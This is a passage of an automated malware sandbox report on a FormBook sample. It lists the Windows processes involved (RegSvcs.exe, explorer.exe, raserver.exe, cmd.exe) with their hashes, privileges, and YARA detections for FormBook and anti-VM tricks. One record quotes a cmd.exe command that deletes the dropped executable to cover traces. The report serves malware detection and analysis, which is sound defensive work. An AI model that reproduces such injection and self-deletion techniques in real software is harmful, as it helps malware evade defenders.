                                                                                                                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2189207331.0000000002371000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                    Antivirus matches:
                                                                                                                                                    • Detection: 25%, ReversingLabs
                                                                                                                                                    Reputation:low

                                                                                                                                                    General

                                                                                                                                                    Start time:09:03:27
                                                                                                                                                    Start date:26/11/2020
                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                    Imagebase:0xf30000
                                                                                                                                                    File size:45216 bytes
                                                                                                                                                    MD5 hash:62CE5EF995FD63A1847A196C2E8B267B
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2218037649.00000000003A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2218037649.00000000003A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2218037649.00000000003A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2218005486.0000000000270000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2218005486.0000000000270000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2218005486.0000000000270000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    Reputation:moderate

                                                                                                                                                    General

                                                                                                                                                    Start time:09:03:29
                                                                                                                                                    Start date:26/11/2020
                                                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:
                                                                                                                                                    Imagebase:0xffca0000
                                                                                                                                                    File size:3229696 bytes
                                                                                                                                                    MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:moderate

                                                                                                                                                    General

                                                                                                                                                    Start time:09:03:38
                                                                                                                                                    Start date:26/11/2020
                                                                                                                                                    Path:C:\Windows\SysWOW64\raserver.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Windows\SysWOW64\raserver.exe
                                                                                                                                                    Imagebase:0x9a0000
                                                                                                                                                    File size:101888 bytes
                                                                                                                                                    MD5 hash:0842FB9AC27460E2B0107F6B3A872FD5
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2378328002.0000000000290000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2378328002.0000000000290000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2378328002.0000000000290000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2378260820.00000000001E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2378260820.00000000001E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2378260820.00000000001E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group

                                                                                                                                                    General

                                                                                                                                                    Start time:09:03:42
                                                                                                                                                    Start date:26/11/2020
                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:/c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
                                                                                                                                                    Imagebase:0x49d30000
                                                                                                                                                    File size:302592 bytes
                                                                                                                                                    MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Disassembly

                                                                                                                                                    Code Analysis
